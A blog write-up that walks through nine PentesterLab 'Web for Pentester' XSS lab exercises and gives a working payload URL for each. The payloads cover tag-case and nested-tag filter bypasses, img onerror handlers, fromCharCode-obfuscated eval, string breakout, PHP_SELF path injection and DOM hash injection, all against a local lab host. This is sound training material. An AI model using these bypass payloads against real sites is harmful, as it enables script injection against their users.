Web for Pentester

XSS Write-Up

Posted on September 1, 2016 as Write-Ups. 6 minutes read.

Today we're going to continue our journey through the word of web application security - more accurately XSS exercises from PentesterLab. It's great way to practice what we have learned so far and also - good challenge. Let's jump into the first one!

Exercise 1

Here we have a very basic example of Cross Site Scripting where you have to change the variable that is visible in the URL (which is our example is name=hacker) into the alert script that will allow us to see whether if it works.

http://192.168.0.12/xss/example1.php?name=<script>alert("Xss")</script>

exercise-1

Great, it works perfectly, let's move to the next one!

Exercise 2

Firstly I wanted to try whether the method from the previous one works but as I suspected it didn't. What we got after entering script was this source code.

<div class="container">
Hello
alert("Xss")

It may be somehow filtering our input - maybe changing it to uppercase will help us?

http://192.168.0.12/xss/example2.php?name=<sCript>alert("Xss")</sCript>

Great! It works and we've bypassed the filter. Let's move on to the next one!

Exercise 3

This one is a little harder - it doesn't allow script or even sCript so we have to try something else. From what I learned about methods to bypass filtering it may be possible to use this simple trick.

http://192.168.0.12/xss/example3.php?name=<scr<script>ipt>alert("Xss")</scr</script>ipt>

If you don't know how this works - the filter firstly looks for script tag, deletes it, and then sends the result. But after taking out the script two other parts scr and ipt will merge into one creating our payload.

Exercise 4

Here it looks like more advanced version of filter, it completely takes out the word script and when the request matches script, it will stop. So what options do we have to bypass it? We can put img tag with some attributes allowing us to create a paylod. Onmouseover will be an excellent example but you can use any other you will think that will work.

http://192.168.0.12/xss/example4.php?name=<img src="blabla" onmouseover="alert('XSS')"></img>

It will even better work with onerror since it will execute automatically when the page loads.

http://192.168.0.12/xss/example4.php?name=<img src="blabla" onerror="alert('XSS')"></img>

Exercise 5

This one is a little trickier - it allows script tags but doesn't allow alert function. How can we make it alert something without actually typing it? We can translate this into the ASCII characters.

alert("XSS") = 097 108 101 114 116 040 034 088 083 083 034 041

Which after small redesign will result in actually working XSS!

http://192.168.0.12/xss/example5.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41))</script>

Exercise 6

This one is a little different. After looking into the source code (which you should always do at the beginning) we get this small JavaScript code.

Hello
<script>
	var $a= "hacker";
</script>

Vaule of $a changes everytime we enter something different in name= field. We can try to manipulate this script into running alert function. Firstly I add " character to indicate that text is before this quotiation mark. Then let's add ; as it's always used in JavaScript at the end of a line. After that I'm ready to add alert('XSS') but it still won't work because of the quotiation mark at the end of the input so let's try commenting it out with //. And it works!

http://192.168.0.12/xss/example6.php?name=me";alert('XSS')//

Exercise 7

Here w're dealing with similar challenge as in the previous one.

Hello
<script>
	var $a= 'hacker';
</script>

Using the previous strategy I manage to get the XSS alert working.

http://192.168.0.12/xss/example7.php?name=hacker';alert('XSS');//

Exercise 8

Hmmm... We've got the input field that will not allow any of our XSS tricks. I actually had no idea how to attack this example so I checked out hints provided by PentesterLab. Let's take a look at them.

Here, the value echoed back in the page is correctly encoded. However, there is still a XSS vulnerability in this page. To build the form, the developer used and trusted PHP_SELF which is the path provided by the user. It’s possible to manipulate the path of the application in order to:

  1. call the current page (however you will get an HTTP 404 page);
  2. get a XSS payload in the page.

This can be done because the current configuration of the server will call /xss/example8.php when any URL matching /xss/example8.php/... is accessed. You can simply get your payload inside the page by accessing /xss/example8.php/[XSS_PAYLOAD]. Now that you know where to inject your payload, you will need to adapt it to get it to work and get the famous alert box.

Wow, I haven't thought about that. Let's see what happens if we simply add it /xss/example8.php/[XSS_PAYLOAD] like in here.

http://192.168.0.12/xss/example8.php/<script>alert("XSS")</script>

But it still doesn't work. We have to somehow tweak it into the working version.

<form action="/xss/example8.php/<script>alert("XSS")</script>" method="POST">
  Your name:<input type="text" name="name" />
  <input type="submit" name="submit"/>

If we take a look at it a little closer we can see that if we add "> after the example8.php it will close the path and allow script to execute.

http://192.168.0.12/xss/example8.php/"><script>alert("XSS")</script>

To the last one!

Exercise 9

By looking at the source code it reveals to us that the script is simply executing everything after the hash string.

<script>
    document.write(location.hash.substring(1));
</script>

Solution will look like this. I don't know why but it worked for me only in Chrome browser, not in Firefox. Luckily we managed to complete this set of exercises.

http://192.168.0.12/xss/example9.php#<script>alert("XSs")</script>

Thanks for tuning in! It was great challenge, and I'm sure to complete other exercise on Web for Pentester ISO. Hopefully there will be more XSS challenges as I'm really enjoying them.

Keep learning and stay safe!

~ W3ndige